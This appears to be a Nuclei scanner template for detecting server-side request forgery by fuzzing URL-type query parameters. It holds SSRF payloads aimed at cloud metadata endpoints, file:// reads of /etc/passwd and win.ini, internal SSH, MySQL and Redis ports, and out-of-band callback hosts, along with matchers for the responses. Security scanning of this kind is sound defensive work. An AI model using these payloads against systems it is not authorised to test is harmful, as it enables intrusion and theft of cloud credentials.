id: response-ssrf info: name: Full Response SSRF Detection author: pdteam,pwnhxl,j4vaovo severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py tags: ssrf,dast http: - pre-condition: - type: dsl dsl: - 'method == "GET"' payloads: ssrf: - 'http://{{interactsh-url}}' - 'http://{{FQDN}}.{{interactsh-url}}' - 'http://{{RDN}}.{{interactsh-url}}' - 'file:////./etc/./passwd' - 'file:///c:/./windows/./win.ini' - 'http://metadata.tencentyun.com/latest/meta-data/' - 'http://100.100.100.200/latest/meta-data/' - 'http://169.254.169.254/latest/meta-data/' - 'http://169.254.169.254/metadata/v1' - 'http://127.0.0.1:22' - 'http://127.0.0.1:3306' - 'dict://127.0.0.1:6379/info' fuzzing: - part: query mode: single keys: - callback - continue - data - dest - dir - domain - feed - file - host - html - imgurl - navigation - next - open - out - page - path - port - redirect - reference - return - show - site - to - uri - url - val - validate - view - window fuzz: - "{{ssrf}}" - part: query mode: single values: - "(https|http|file)(%3A%2F%2F|://)(.*?)" fuzz: - "{{ssrf}}" stop-at-first-match: true matchers-condition: or matchers: - type: word part: body words: - "Interactsh Server" - type: regex part: body regex: - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' - type: regex part: body regex: - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' - type: regex part: body regex: - '(\d.\d.\d)(.*?)mysql_native_password' - type: regex part: body regex: - 'root:.*?:[0-9]*:[0-9]*:' - type: word part: body words: - 'for 16-bit app support' - type: regex part: body regex: - 'dns-conf\/[\s\S]+instance\/' - type: regex part: body regex: - 'app-id[\s\S]+placement\/' - type: regex part: body regex: - 'ami-id[\s\S]+placement\/' - type: regex part: body regex: - 'id[\s\S]+interfaces\/' # digest: 4a0a00473045022100f1036d0d83d2d319f244f143873a16f2ae222e1f0d7dfa3a12604bc50547945c022014f428e033f9ac02ba873325301b910fde7ae7fac3613ab0388ea5d9a14e5f56:922c64590222798bb761d5b6d8e72950